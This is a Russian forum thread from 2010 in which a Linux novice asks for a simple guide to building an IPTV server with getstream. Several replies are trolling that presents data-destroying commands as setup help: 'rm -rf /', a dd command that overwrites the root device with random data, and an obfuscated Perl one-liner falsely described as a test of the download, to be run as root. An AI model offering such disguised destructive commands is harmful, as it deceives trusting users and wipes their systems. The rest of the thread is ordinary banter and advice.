maxkst Опубликовано 18 июня, 2010 (изменено) Помогите с нуля собрать сервер, на 36E, Шаринг, линукс не знаю, читать или учиться не охота или некогда. Получится короткая инструкция для чайников. Главное подробная последовательность действий без лирики... Итак, с чего начнем?? Изменено 18 июня, 2010 пользователем maxkst Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
kapa Опубликовано 18 июня, 2010 Неужели вы думаете, что если вам не охота читать или учиться, то кому-то охота писать и учить? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 Неужели вы думаете, что если вам не охота читать или учиться, то кому-то охота писать и учить? В учебных заведениях многие так учатся )). Глядишь, что-то да зацепится... Спорить на эту тему нет желания, давайте без лирики... Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
-Ars- Опубликовано 18 июня, 2010 Итак, с чего начнем?? Сильно... Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 (изменено) С момента открытия темы установился Debian 5.0.3 (Lenny) Core 2.6.26-2-686 на машинку Cel2,26/512Mb/80Gb/SS3(TT-budget S-1401). Что дальше делать?? Пожалуйста, оставляйте комментарии только по теме )) Изменено 18 июня, 2010 пользователем maxkst Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Denis Samsonov Опубликовано 18 июня, 2010 sudo bash rm -rf / Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
ilia_2s Опубликовано 18 июня, 2010 sudo bash rm -rf / Если не поможет, можно поробовать: sudo -s string=$(mount | grep ' / ') && array=( $string ) && A=${array[0]} && dd if=/dev/random of=$A Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 Ну и конечно же вы прокомментируете эти команды, ведь для чайников же..... Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
olegi Опубликовано 18 июня, 2010 Ну и конечно же вы прокомментируете эти команды, ведь для чайников же..... Комментарии излишни. Предложены самые короткие пути реализации IPTV. ) Смело вводите команды и наслаждайтесь. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 Добавил git в synaptic и скачалось git clone git://hydra.gt.owl.de/getstream.git . Спасибо всем за подсказки, дальше что делаем?? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Denis Samsonov Опубликовано 18 июня, 2010 cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' попробуйте от рута запустить и вывод сюда показать. Эта ком*** протестирует то что сказачалсь Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' попробуйте от рута запустить и вывод сюда показать. Эта ком*** протестирует то что сказачалсь да вроде там нечего тестировать )) в readme написано: Building: - Install libevent and glib - Probably adapt paths in Makefile - type "make" что тут делать надо? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Denis Samsonov Опубликовано 18 июня, 2010 (изменено) дык в этом каталоге запустите ту команду что я написал. потом make реально самый простой путь реализации IPTV Изменено 18 июня, 2010 пользователем Denis Samsonov Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
ilia_2s Опубликовано 18 июня, 2010 cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' моя аська очень логично отобразила смайлы Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 ладно, подожду еще )) Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
ilia_2s Опубликовано 18 июня, 2010 или некогда. ? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 или некогда. ? пока жду - читаю )) Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Voicemaster Опубликовано 18 июня, 2010 Как закалялись чайники... Повесть.. . Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 Поглумиться над чайником все горазды, а помочь - не каждый... Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
20Ilya Опубликовано 18 июня, 2010 в командной строке lynx google.ru наличие hands.dll, brain.sys (.sys!!! а не .vxd!!!) и не залоченое time.krn обязательны на управляющем терминале... ЗЫ. вот я как-то нашёл время и копаясь только в теме про иптв на этом форуме только по данным за этот год собрал рабочий микростендик... Вот только я не пров и хомячков нема... А на одного абонента на 3 компа раздавало... Но от отсутствия применения rm-rf/ и щас на железке новый сервак... Более нужный... Так что это несложно... Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
maxkst Опубликовано 18 июня, 2010 В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо. Чем больше это будут уметь, тем дальше можно будет по теме продвинуться. Я с линуксом не пересекался, и уйдут дни, недели, месяцы, чтобы понять и разобраться, времени столько у меня нет. А кто не желает помочь, просто проходите мимо, умники-выпендрежники достали на форумах. Если я нарушил правила форума, задавая ламерские вопросы - да покарает меня модератор, ноги моей больше здесь не будет)). Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
Lynx10 Опубликовано 18 июня, 2010 (изменено) В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо. Чем больше это будут уметь, тем дальше можно будет по теме продвинуться. Я с линуксом не пересекался, и уйдут дни, недели, месяцы, чтобы понять и разобраться, времени столько у меня нет. А кто не желает помочь, просто проходите мимо, умники-выпендрежники достали на форумах. Если я нарушил правила форума, задавая ламерские вопросы - да покарает меня модератор, ноги моей больше здесь не будет)).ну так займитесь - сделайте доброе дело - не только себе - ( вы же тогда нормально разберётесь в теме ) но и для других - ВСЕ ВАМ СПАСИБО СКАЖУТ! И ВЫ ПЕРВЫЙ СКАЖЕТЕ ВСЕМ СПАСИБО! А если вас что-то или кто то достал - можете смело сюда не писать ;) - никто не заметит ;) Изменено 18 июня, 2010 пользователем Lynx10 Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
ilia_2s Опубликовано 18 июня, 2010 так что вам линукс дался, делайте на VMS или что там у вас Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
vIv Опубликовано 20 июня, 2010 В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо. Идёшь к ближайшему интегратору и просишь разработать проект для тебя. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
desperate Опубликовано 24 июня, 2010 В соседней ветке, по getstream, уверен, есть почти все по интересующей меня теме, но это более 30 стр проб и ошибок. А надо то из всего сделать простецкий мануал. Краткий, с уже реально проверенными инструкциями.... и не мне одному это надо.Идёшь к ближайшему интегратору и просишь разработать проект для тебя. и одтаешь около 2 милионов дензнаков... для более-менее нормального решения :) Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...